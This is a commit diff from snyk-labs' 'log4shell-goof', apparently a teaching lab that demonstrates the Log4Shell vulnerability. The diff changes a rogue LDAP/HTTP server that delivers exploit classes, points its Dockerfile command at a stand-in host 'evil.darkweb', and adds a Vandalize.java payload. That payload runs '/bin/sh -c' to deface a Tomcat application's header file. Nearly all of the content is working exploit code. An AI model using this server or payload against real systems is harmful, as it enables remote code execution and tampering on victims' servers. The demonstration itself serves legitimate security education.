troubleshooting

snyk-labs · Dec 17, 2021 · da12e76 · da12e76
1 parent 9a7d179
commit da12e76
Show file tree

Hide file tree

Showing 4 changed files with 25 additions and 10 deletions.
diff --git a/log4shell-goof/log4shell-server/Dockerfile b/log4shell-goof/log4shell-server/Dockerfile
@@ -1,13 +1,11 @@
 FROM maven:3-jdk-8-slim as build
 COPY . .
-RUN mvn clean compile assembly:single
-RUN mkdir /app
-RUN jar xvf target/*.jar
+RUN --mount=target=$HOME/.m2,type=cache mvn clean compile assembly:single
 
 FROM openjdk:8 as ldap
 COPY --from=build target/*.jar /server.jar
 EXPOSE 8000
 EXPOSE 9999
 
-CMD ["java", "-jar", "/server.jar"]
+CMD ["java", "-jar", "/server.jar", "http://evil.darkweb:9999/#Vandalize", "8000", "9999", "Vandalize.class"]
 
diff --git a/log4shell-goof/log4shell-server/k8s/deploy.yaml b/log4shell-goof/log4shell-server/k8s/deploy.yaml
@@ -22,8 +22,8 @@ spec:
         app: log4shell
     spec:
       containers:
-        - image: ${DOCKER_ACCOUNT}/log4shell-server:latest
-          name: ldap
+        - name: ldap
+          image: ${DOCKER_ACCOUNT}/log4shell-server:latest
 ---
 apiVersion: v1
 kind: Service

diff --git a/log4shell-goof/log4shell-server/src/main/java/Server.java b/log4shell-goof/log4shell-server/src/main/java/Server.java
@@ -24,13 +24,14 @@
 
 public  class  Server  {
     private  static  final String LDAP_BASE = "dc=example,dc=com" ;
-
+    private static String payloadClassname;
     public  static  void  main (String[] args) throws IOException, LDAPException {
-        String[] defaultArgs = {"http://127.0.0.1:8000/#Evil", "9999", "8000"};
+        String[] defaultArgs = {"http://127.0.0.1:8000/#Evil", "9999", "8000", "Evil.class"};
 
-        if (args.length != 3) {
+        if (args.length != 4) {
             args = defaultArgs;
         }
+        payloadClassname = args[3];
 
         setupLDAP(args[0], Integer.parseInt(args[1]));
         setupHTTP(Integer.parseInt(args[2]));
@@ -72,7 +73,7 @@ private static void setupHTTP(int port) throws IOException {
     }
 
     private static byte[] readEvil() throws IOException {
-        InputStream is = Server.class.getClassLoader().getResourceAsStream("Evil.class");
+        InputStream is = Server.class.getClassLoader().getResourceAsStream(payloadClassname);
         ByteArrayOutputStream bos = new ByteArrayOutputStream();
 
         int nRead;

diff --git a/log4shell-goof/log4shell-server/src/main/java/Vandalize.java b/log4shell-goof/log4shell-server/src/main/java/Vandalize.java
@@ -0,0 +1,16 @@
+import javax.naming.Context;
+import javax.naming.Name;
+import javax.naming.spi.ObjectFactory;
+import java.util.Hashtable;
+
+public class Vandalize implements  ObjectFactory  {
+    @Override
+    public Object getObjectInstance (Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment)  throws Exception {
+        String[] cmd = {
+                "/bin/sh",
+                "-c",
+                "echo '<center><h1>Nice container you have, I think I will move in!</h1></center>' >> /usr/local/tomcat/webapps/todolist/WEB-INF/views/common/header.jspf"};
+        Runtime.getRuntime().exec(cmd);
+        return  null;
+    }
+}